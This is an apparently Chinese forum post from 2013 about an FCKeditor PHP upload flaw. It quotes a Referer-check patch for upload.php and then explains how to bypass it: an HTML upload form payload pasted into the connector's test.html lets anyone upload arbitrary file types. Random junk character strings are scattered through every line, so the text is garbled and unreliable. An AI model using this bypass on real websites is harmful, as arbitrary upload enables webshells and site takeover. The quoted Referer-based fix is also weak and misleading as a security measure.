漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php# E) o' z) {3 i. h$ R
网上给出的修复方案是
1 E. M& E3 w* I% w( i! o修复方法,删除FCK编辑器用其他的编辑器
' U5 W: @1 g( q% J4 y7 Z或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
9 i; X' n/ x% r* y在
" v8 j3 Y2 i$ lrequire(‘config.php’);
5 d( N/ t& n2 e) _, G: n- Y( rrequire(‘util.php’);1 c; k4 B: p% Y0 e3 e1 y6 W' o9 R
的下面添加以下代码—————————–
! N5 }4 J: N4 H( z7 Y( R//防止外部提交
( w; [5 K3 T, o8 W; Mfunction outsidepost()) C; @5 e+ E# |, l
{$ o, x% p1 a9 u1 p$ j
$servername=$_SERVER['SERVER_NAME'];
( K# ]# `' o" v0 x) e1 j! _$sub_from=@$_SERVER['HTTP_REFERER'];0 q+ L5 e; a$ M# D0 z8 w+ _
$sub_len=strlen($servername);& c+ X$ e/ n3 [* J4 a6 S8 K
$checkfrom=substr($sub_from,7,$sub_len);8 p1 s& Z' K4 f
if($checkfrom!=$servername){
8 j5 T1 [7 n! L% O& Secho(“you don’t outsidepost!”);5 S ^; q3 H5 E, @2 t0 k
exit;" a6 G. a8 w, m$ V! j% d
}: `- h ?& D2 ^ D5 l2 `
}/ c9 k. j Q2 M8 v" {
outsidepost();& [" j2 W4 S: s. \+ T
防止外部提交,但是没有防止内部提交,' H1 d) {) N2 `# C$ m# }
利用方法:
6 V0 M6 \5 C& o8 Y% t6 e1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html8 L8 }- n4 H. Z% j7 P1 v8 M' X
2,在Current Folder 框输入! \9 l" Z/ e5 O S( ^
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
8 [" U0 c' g8 V- y. [然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。) \: x1 y# q; y1 [
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对